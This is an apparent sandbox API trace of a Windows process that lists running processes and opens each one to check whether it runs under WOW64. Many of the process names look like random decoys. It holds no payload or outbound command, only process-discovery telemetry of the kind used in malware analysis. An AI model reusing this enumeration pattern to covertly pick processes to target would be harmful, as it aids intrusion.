	[0075.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.710] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.710] CloseHandle (hObject=0x224) returned 1
	[0075.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c28) returned 0xc0000004
	[0075.788] VirtualAlloc (lpAddress=0x0, dwSize=0x16d28, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d28, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.793] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.793] CloseHandle (hObject=0x224) returned 1
	[0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.793] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.793] CloseHandle (hObject=0x224) returned 1
	[0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.793] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.793] CloseHandle (hObject=0x224) returned 1
	[0075.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.794] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.794] CloseHandle (hObject=0x224) returned 1
	[0075.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.794] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.794] CloseHandle (hObject=0x224) returned 1
	[0075.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.794] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.794] CloseHandle (hObject=0x224) returned 1
	[0075.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.794] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.794] CloseHandle (hObject=0x224) returned 1
	[0075.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.795] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.795] CloseHandle (hObject=0x224) returned 1
	[0075.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.795] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.795] CloseHandle (hObject=0x224) returned 1
	[0075.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.795] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.795] CloseHandle (hObject=0x224) returned 1
	[0075.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.795] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.795] CloseHandle (hObject=0x224) returned 1
	[0075.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.796] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.796] CloseHandle (hObject=0x224) returned 1
	[0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.796] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.796] CloseHandle (hObject=0x224) returned 1
	[0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.796] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.796] CloseHandle (hObject=0x224) returned 1
	[0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.796] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.797] CloseHandle (hObject=0x224) returned 1
	[0075.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.797] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.797] CloseHandle (hObject=0x224) returned 1
	[0075.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.797] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.797] CloseHandle (hObject=0x224) returned 1
	[0075.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.797] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.797] CloseHandle (hObject=0x224) returned 1
	[0075.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.798] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.798] CloseHandle (hObject=0x224) returned 1
	[0075.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.798] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.798] CloseHandle (hObject=0x224) returned 1
	[0075.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.801] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.801] CloseHandle (hObject=0x224) returned 1
	[0075.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.801] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.801] CloseHandle (hObject=0x224) returned 1
	[0075.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.801] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.801] CloseHandle (hObject=0x224) returned 1
	[0075.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb08, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.801] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.801] CloseHandle (hObject=0x224) returned 1
	[0075.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.801] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.802] CloseHandle (hObject=0x224) returned 1
	[0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.802] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.802] CloseHandle (hObject=0x224) returned 1
	[0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.802] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.802] CloseHandle (hObject=0x224) returned 1
	[0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.802] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.802] CloseHandle (hObject=0x224) returned 1
	[0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.802] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.803] CloseHandle (hObject=0x224) returned 1
